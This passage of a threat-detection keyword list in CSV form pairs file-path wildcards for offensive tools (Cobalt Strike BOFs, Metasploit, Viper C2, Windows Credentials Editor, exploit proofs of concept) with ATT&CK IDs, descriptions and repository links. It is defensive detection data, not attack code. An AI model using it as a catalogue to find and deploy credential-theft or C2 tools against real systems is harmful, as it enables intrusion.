Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/versant-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/viper.conf*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/viper.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/viper.sln*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z 
-*/viper/Docker/*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/viper/Docker/nginxconfig/htpasswd*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/vipermsf*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*/viperpython*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - 
T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/viperpython.git*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/virtualenvs/icebreaker*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/VirusTotalC2/*,offensive_tool_keyword,VirusTotalC2,Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one,T1071.004 - T1102 - T1021.002,TA0011 - TA0008 - TA0042,N/A,N/A,C2,https://github.com/RATandC2/VirusTotalC2,1,1,N/A,10,10,5,81,2022-09-28T15:10:44Z,2022-09-28T15:12:42Z -*/VisualBasicObfuscator*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*/vmauthd-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vmware_enum_*.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/VMware-CVE-2022-22954*,offensive_tool_keyword,POC,POC for VMWARE CVE-2022-22954,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/sherlocksecurity/VMware-CVE-2022-22954,1,1,N/A,N/A,3,285,53,2022-04-13T06:15:11Z,2022-04-11T13:59:23Z -*/vmware-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vnc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vncdll.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/vncdll/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/vncEncoder.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/VNCHooks*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/VNCHooks.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/vnc-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vnc-title.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vnik_v1.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/voldemort-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vpc__enum_lateral_movement*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/vss-enum.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z
-*/vssenum/*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z
-*/vtam-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/vulners.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/vulnscan.yaml*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z
-*/vulnserver.py*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z
-*/vulscan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,1,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z
-*/vuze-dht-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/waf__enum/main.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*/wapitiCore/*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z
-*/wapiti-scanner/*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z
-*/Watson.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z
-*/wce32.exe*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A
-*/wce64.exe*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A
-*/wce-beta.zip*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A
-*/wdb-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/wdextract.cpp*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z
-*/wdextract.cpp*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z
-*/WDExtract.git*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z
-*/wdextract32.exe*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z
-*/wdextract64.exe*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z
-*/WdToggle.c*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 
- T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z
-*/WdToggle.h*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z
-*/weakpass.git*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z
-*/Web/decouverte.txt*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z
-*/Web/discovery.txt*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z
-*/web/pwn.html*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/ItsNee/Follina-CVE-2022-30190-POC,1,1,N/A,N/A,1,5,0,2022-07-04T13:27:13Z,2022-06-05T13:54:04Z
-*/web_rce.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*/WebC2.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z
-*/WebDavC2.git*,offensive_tool_keyword,WebDavC2,WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.,T1571 - T1210.001 - T1190,TA0003 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Arno0x/WebDavC2,1,0,N/A,10,10,116,72,2019-08-27T06:51:42Z,2017-09-07T14:00:28Z
-*/web-hacking-toolkit*,offensive_tool_keyword,web-hacking-toolkit,A web hacking toolkit Docker image with GUI applications support.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signedsecurity/web-hacking-toolkit,1,1,N/A,N/A,2,142,29,2023-01-31T10:11:30Z,2021-10-16T15:47:52Z
